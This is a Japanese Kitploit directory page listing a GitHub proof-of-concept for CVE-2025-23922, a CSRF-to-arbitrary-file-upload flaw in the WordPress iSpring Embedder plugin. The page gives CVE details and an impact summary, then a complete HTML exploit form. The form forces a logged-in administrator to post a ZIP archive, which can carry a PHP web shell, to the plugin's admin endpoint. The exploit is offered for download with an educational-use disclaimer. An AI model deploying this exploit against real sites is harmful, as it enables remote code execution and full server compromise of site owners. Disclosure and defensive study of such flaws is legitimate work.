Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-23922 — WordPress iSpring Embedder プラグイン <= 1.0 - 任意ファイルアップロードにつながるCSRF脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-23922
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnxploited/cve-2025-23922

CVE-2025-23922

WordPress iSpring Embedder プラグイン <= 1.0 - 任意ファイルアップロードにつながるCSRF脆弱性

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-23922 - WordPress iSpring Embedder CSRFから任意ファイルアップロード

📌 CVE詳細

  • CVE ID: CVE-2025-23922
  • 公開日: 2025-01-16
  • 影響を受けるプラグイン: WordPress iSpring Embedderプラグイン
  • 影響を受けるバージョン: <= 1.0
  • プラグイン作者: Harsh
  • 脆弱性タイプ: クロスサイトリクエストフォージェリ (CSRF) → 任意ファイルアップロード
  • CWE ID: CWE-352: クロスサイトリクエストフォージェリ (CSRF)
  • CVSSスコア: 10.0 (緊急)
  • ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🔥 説明

iSpring Embedder WordPressプラグインのCSRF脆弱性により、認証されていないリモート攻撃者が認証済みの管理者を騙して、任意のファイル (PHP Webシェルなど) をサーバーにアップロードさせることができます。

脆弱なエンドポイントにはCSRF対策が実装されておらず、ファイルアップロード機能は.zipファイルを受け入れ、以下の場所に展開されます。

root@kitploit:~
/wp-content/uploads/iSpring_embedder/

💡 影響

攻撃者は以下のことが可能です:

  • 認証なしでファイルアップロードをトリガーする。
  • ZIPアーカイブ内に悪意のあるPHPファイルをアップロードすることで、リモートコード実行 (RCE) を達成する。
  • 巧妙に細工されたWebシェルと連鎖させることで、Webサーバー全体を侵害する。

🚀 概念実証 (PoC) エクスプロイト (HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF File Upload Exploit</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      padding: 20px;
    }
    .container {
      background: #fff;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 600px;
      margin: auto;
    }
    h1 {
      color: #d9534f;
    }
    input[type="file"],
    input[type="submit"] {
      margin-top: 10px;
      padding: 10px;
      font-size: 16px;
    }
    .footer {
      margin-top: 30px;
      font-size: 14px;
      color: #777;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>CSRF Exploit – File Upload</h1>

    <p>
      This is a proof-of-concept (PoC) exploit for the following vulnerability:
    </p>
    <ul>
      <li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
      <li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
      <li><strong>CVE:</strong> CVE-2025-23922</li>
      <li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
      <li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
    </ul>

    <form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
      <label><strong>Select ZIP file to upload:</strong></label><br>
      <input type="file" name="zip_file" required><br>
      <input type="hidden" name="file_name" value="exploit_csrf">
      <input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
    </form>

    <div class="footer">
      <p>
        Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
        <strong>CVE-2025-23922</strong><br>
        Developed by <strong>Nxploit | Khaled Alenazi</strong>
      </p>
    </div>
  </div>
</body>
</html>



⚠️ 免責事項

この概念実証コードは、教育および研究目的のみで提供されます。
作者は、このエクスプロイトの誤用またはそれによって生じた損害について一切責任を負いません。

Nxploit | Khaled Alenazi
セキュリティ研究者 & エクスプロイト開発者
https://github.com/Nxploit

ツールをダウンロード